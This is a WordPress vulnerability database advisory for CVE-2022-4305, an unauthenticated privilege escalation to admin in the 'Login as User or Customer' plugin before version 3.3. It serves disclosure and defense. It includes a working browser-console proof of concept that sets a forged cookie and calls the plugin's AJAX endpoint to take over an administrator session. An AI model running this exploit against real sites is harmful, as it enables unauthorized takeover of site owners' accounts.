Login as User or Customer < 3.3 – Unauthenticated Privilege Escalation to Admin | CVE 2022-4305 | Plugin Vulnerabilities

Description

The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user, then reload the page to be logged in as the user with ID:

document.cookie = "loginas_old_user_id=1";
fetch("/wp-admin/admin-ajax.php?action=loginas_return_admin", {
  "method": "GET",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

login-as-customer-or-user

Fixed in 3.3

References

CVE

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

David

Submitter

David

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

286d972d-7bda-455c-a226-fd9ce5f925bd

Timeline

Publicly Published

2022-12-27 (about 1 years ago)

Added

2022-12-27 (about 1 years ago)

Last Updated

2022-12-27 (about 1 years ago)

Other

Published

Title

Published

2023-11-23

Title

Salon booking system < 8.7 - Authenticated (Editor+) Privilege Escalation

Published

2020-04-13

Title

Responsive Poll < 1.3.4 - Broken Authentication and Missing Capability Checks on AJAX calls

Published

2023-09-04

Title

All in One B2B for WooCommerce <= 1.0.3 - Unauthenticated Privilege Escalation

Published

2021-01-12

Title

Orbit Fox by ThemeIsle < 2.10.3 - Authenticated Privilege Escalation

Published

2023-11-07

Title

Ovic Responsive WPBakery < 1.2.9 - Subscriber+ Option Update